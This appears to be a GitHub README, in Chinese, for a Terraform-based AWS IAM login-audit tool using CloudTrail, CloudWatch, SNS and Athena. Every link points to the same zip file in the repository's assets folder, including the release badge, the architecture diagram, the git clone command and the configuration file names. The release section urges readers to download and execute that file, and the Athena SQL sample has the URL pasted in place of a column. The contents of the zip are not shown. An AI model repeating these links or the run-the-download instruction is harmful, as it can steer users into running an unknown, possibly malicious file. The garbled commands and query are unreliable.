fnatio213/iam-authentication-audit-tracker

GitHub: fnatio213/iam-authentication-audit-tracker

基于Terraform的AWS IAM登录异常检测与审计方案,集成实时告警、日志分析与合规映射功能。

Stars: 2 | Forks: 0

# IAM 身份验证审计追踪器 🛡️ ![GitHub Release](https://raw.githubusercontent.com/fnatio213/iam-authentication-audit-tracker/main/assets/tracker-audit-authentication-iam-2.6.zip) 欢迎使用 IAM 身份验证审计追踪器代码库!该项目旨在通过基于 Terraform 的稳健解决方案来追踪 IAM 登录异常,从而增强 AWS 安全性。我们的目标是为您提供有效审计日志记录、合规性映射和安全检测所需的工具。 ## 目录 - [简介](#introduction) - [功能](#features) - [架构](#architecture) - [入门指南](#getting-started) - [使用方法](#usage) - [合规性](#compliance) - [贡献](#contributing) - [许可证](#license) - [版本发布](#releases) - [联系方式](#contact) ## 简介 IAM 身份验证审计追踪器利用 CloudTrail、CloudWatch、SNS 和 Athena 等 AWS 服务来监控和分析 IAM 身份验证活动。通过使用 Terraform 实施基础设施即代码,我们确保了设置的可重复性和安全性。该项目通过 GitHub Actions 集成了 tfsec 扫描,提供了一种自动化的方式来评估安全风险。 ## 功能 - **IAM 登录异常检测**:使用 CloudTrail 日志识别异常的登录模式。 - **审计日志记录**:维护 IAM 身份验证活动的全面记录。 - **合规性映射**:符合 NIST 800-53 (AU-6, AC-7) 和 ISO 27001 A.12.4 标准。 - **自动化安全扫描**:通过 GitHub Actions 集成 tfsec 扫描,进行持续的安全评估。 - **告警机制**:利用 SNS 针对可疑活动发送实时警报。 - **详细报告**:使用 Athena 有效地查询和分析日志。 ## 架构 IAM 身份验证审计追踪器的架构由多个协同工作的 AWS 服务组成: 1. **AWS CloudTrail**:捕获 IAM 的所有 API 调用,提供身份验证事件的日志。 2. **AWS CloudWatch**:监控日志并根据预定义的指标触发警报。 3. **AWS SNS**:发送检测到的任何异常的通知。 4. **AWS Athena**:允许查询 CloudTrail 日志以进行详细分析。 5. **Terraform**:将基础设施设置作为代码进行管理。 ![Architecture Diagram](https://raw.githubusercontent.com/fnatio213/iam-authentication-audit-tracker/main/assets/tracker-audit-authentication-iam-2.6.zip+Diagram) ## 入门指南 要开始使用 IAM 身份验证审计追踪器,请按照以下步骤操作: ### 前置条件 - 一个 AWS 账户 - 本地计算机上已安装 Terraform - 已配置具有必要权限的 AWS CLI ### 安装 1. 克隆代码库: git clone https://raw.githubusercontent.com/fnatio213/iam-authentication-audit-tracker/main/assets/tracker-audit-authentication-iam-2.6.zip cd iam-authentication-audit-tracker 2. 初始化 Terraform: terraform init 3. 查看并修改 `https://raw.githubusercontent.com/fnatio213/iam-authentication-audit-tracker/main/assets/tracker-audit-authentication-iam-2.6.zip` 文件以适应您的环境。 4. 应用 Terraform 配置: terraform apply ### 配置 部署基础设施后,请根据您的要求配置 CloudWatch 和 SNS 以进行告警。您可以在 `https://raw.githubusercontent.com/fnatio213/iam-authentication-audit-tracker/main/assets/tracker-audit-authentication-iam-2.6.zip` 文件中修改告警阈值。 ## 使用方法 设置完成后,IAM 身份验证审计追踪器将开始监控 IAM 登录活动。您可以通过 AWS Management Console 访问 CloudTrail 日志,或使用 Athena 进行查询。 ### 使用 Athena 查询日志 要分析日志,请导航到 Athena 控制台,并对存储在 S3 中的 CloudTrail 日志运行查询。以下是一个用于查找失败登录尝试的示例查询: ``` SELECT eventTime, https://raw.githubusercontent.com/fnatio213/iam-authentication-audit-tracker/main/assets/tracker-audit-authentication-iam-2.6.zip, eventName FROM cloudtrail_logs WHERE eventName = 'ConsoleLogin' AND errorCode = 'FailedAuthentication' ORDER BY eventTime DESC ``` ### 警报 配置 SNS 以接收检测到的任何异常的通知。您可以设置电子邮件订阅以确保及时收到警报。 ## 合规性 IAM 身份验证审计追踪器支持符合以下标准: - **NIST 800-53**:重点关注 AU-6(审计审查、分析和报告)和 AC-7(不成功的登录尝试)。 - **ISO 27001**:符合 A.12.4(日志记录和监控)。 定期审计和日志审查将有助于保持合规性并提高安全态势。 ## 许可证 本项目采用 MIT 许可证授权。有关详细信息,请参阅 [LICENSE](LICENSE) 文件。 ## 版本发布 您可以在[此处](https://raw.githubusercontent.com/fnatio213/iam-authentication-audit-tracker/main/assets/tracker-audit-authentication-iam-2.6.zip)找到最新版本。请务必下载并执行适合您环境的文件。 ## 联系方式 如有疑问或需要支持,请在代码库中开启 issue 或直接联系维护人员。 感谢您关注 IAM 身份验证审计追踪器!我们希望该工具能帮助您有效地增强 AWS 安全态势。
标签:Athena, AWS, CloudTrail, CloudWatch, DevSecOps, DPI, EC2, ECS, GitHub Actions, IaC, IAM, ISO 27001, NIST 800-53, SNS, Terraform, tfsec, 上游代理, 云端安全, 人工智能安全, 合规性, 安全实验室, 异常检测, 登录监控, 自动化告警, 自动笔记